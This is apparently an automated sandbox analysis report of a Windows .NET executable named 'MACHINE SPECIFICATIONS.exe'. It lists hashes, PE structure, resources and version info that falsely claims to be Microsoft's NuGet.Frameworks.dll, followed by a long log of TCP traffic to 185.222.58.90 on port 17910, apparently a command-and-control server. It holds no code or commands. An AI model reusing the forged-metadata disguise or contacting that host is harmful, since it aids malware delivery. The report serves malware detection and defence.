                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.009000426055696
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:MACHINE SPECIFICATIONS.exe
                                                                                  File size:1190912
                                                                                  MD5:6a54566bf72bc5f07bac04c982dab3e6
                                                                                  SHA1:603a754281efa379d923304ba0e8e551888c2188
                                                                                  SHA256:b618d6a08d5d165812cef6e3f1239b33bd4ab60971c3a41d1da8fc22bfb9ac9a
                                                                                  SHA512:40034d737f5bf0f99b5025f9ff75388ce5248f9af578f3b50638a9f86f34e69ca6f3909839ddf3451f11a3b44dec394c091af1ccf5c9bd8810d76ada6ac87607
                                                                                  SSDEEP:24576:x6IpB32sS0FxVv0XNOYr0NBr4+NoIiICaebYsyEr6jlWp:x6M2woNOi0NBr4+NoIiICaebYszP
                                                                                  TLSH:4B450731205C8951DFAE2E3AC3AF96DC16791DEA9A57850D31C77783C522E036C9B32B
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8.e..........."...0......^........... ........@.. ....................................`................................

                                                                                  File Icon

                                                                                  Icon Hash:8604a4acbcace4f8

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4eeace
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                  Time Stamp:0xD2658D38 [Sat Nov 8 23:37:28 2081 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xee9d80x4a.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x35b58.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xeea220x38.text
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000xecad40xecc00False0.588961028247data7.11216408113IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xf00000x35b580x35c00False0.443722747093data6.13223538227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1260000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  IBC0xf02d40x44fedata
                                                                                  RT_ICON0xf47d40x96b5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                  RT_ICON0xfde8c0x10828dBase III DBT, version number 0, next free block index 40
                                                                                  RT_ICON0x10e6b40x94a8data
                                                                                  RT_ICON0x117b5c0x5488data
                                                                                  RT_ICON0x11cfe40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                                  RT_ICON0x12120c0x25a8data
                                                                                  RT_ICON0x1237b40x10a8data
                                                                                  RT_ICON0x12485c0x988data
                                                                                  RT_ICON0x1251e40x468GLS_BINARY_LSB_FIRST
                                                                                  RT_GROUP_ICON0x12564c0x84data
                                                                                  RT_VERSION0x1256d00x488data

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain

                                                                                  Version Infos

                                                                                  DescriptionData
                                                                                  Translation0x0000 0x04b0
                                                                                  LegalCopyright Microsoft Corporation. All rights reserved.
                                                                                  Assembly Version5.6.0.5
                                                                                  InternalNameNuGet.Frameworks.dll
                                                                                  FileVersion5.6.0.6591
                                                                                  CompanyNameMicrosoft Corporation
                                                                                  CommentsNuGet's understanding of target frameworks.
                                                                                  ProductNameNuGet
                                                                                  ProductVersion5.6.0-rtm.6591+636570e68732c1f718ede9ca07802d7b1cc69aa0.636570e68732c1f718ede9ca07802d7b1cc69aa0
                                                                                  FileDescriptionNuGet.Frameworks
                                                                                  OriginalFilenameNuGet.Frameworks.dll

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 25, 2022 05:54:34.804373980 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:34.840136051 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:34.840245962 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:35.038233042 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:35.124947071 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.386113882 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.386611938 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:35.465347052 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.616060972 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.717648029 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.240025043 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.325726032 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.592434883 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.593358040 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.684371948 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723193884 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723258972 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723299026 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723339081 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723364115 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.724369049 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.662625074 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.663996935 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.690510035 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.690692902 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.691005945 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.691071033 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.701167107 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.728950977 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.730226040 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.756819010 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.756861925 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.757016897 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.757106066 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783325911 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.783456087 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.783543110 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783726931 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.783746004 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783869982 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783940077 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.784049988 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.784213066 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.784311056 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.809860945 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810033083 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810046911 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810168028 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810214043 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810353041 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810587883 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810703039 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810785055 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810899973 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.836679935 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.836823940 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.836910009 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837018967 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837037086 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837145090 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837232113 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837337971 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837466955 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837594986 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837738037 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837837934 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.838054895 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.838170052 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.838236094 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.838354111 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.838499069 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.838572025 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863331079 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.863552094 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863555908 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.863740921 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.863745928 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863903046 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863929987 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864089012 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.864263058 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864552021 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864697933 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864752054 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.864865065 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.864970922 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865107059 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865294933 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865452051 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865572929 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865698099 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865776062 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865900993 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865984917 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866108894 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.866339922 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866489887 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.866492033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866620064 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.866780043 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866923094 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.867069960 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.867217064 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.867265940 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.867497921 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.867535114 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.867645979 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890280008 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890316963 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890496969 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890518904 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890537024 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890556097 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890573978 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890580893 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890652895 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890676022 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890712023 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890752077 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890779018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890785933 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.891087055 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891396999 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891577005 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891906023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891922951 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892051935 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892100096 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892117023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892206907 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892226934 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892246008 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892262936 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892282009 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892299891 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892319918 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892339945 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892416000 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892433882 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892574072 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892662048 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892680883 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892699957 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892877102 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893171072 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893371105 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893611908 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893866062 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.906907082 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.906958103 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.906980991 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907005072 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907030106 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907056093 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907082081 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913584948 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913630009 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913660049 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913687944 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913713932 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913742065 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913768053 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913824081 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.914155006 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917100906 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917314053 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917555094 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917891026 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.918191910 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.918447018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.918533087 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918710947 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918787003 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918889046 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918981075 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.919015884 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945106983 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945152998 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945305109 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945353031 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945378065 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945466995 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945642948 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945750952 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945916891 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946012974 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946069956 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946154118 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946342945 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946434975 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946583033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946696997 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946892023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946985960 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947118998 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947194099 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947350025 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947448015 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947662115 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947742939 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947849035 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947920084 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948117018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948204041 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948343992 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948427916 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948662996 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948688984 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948715925 CEST1791049750185.222.58.90192.168.2.3
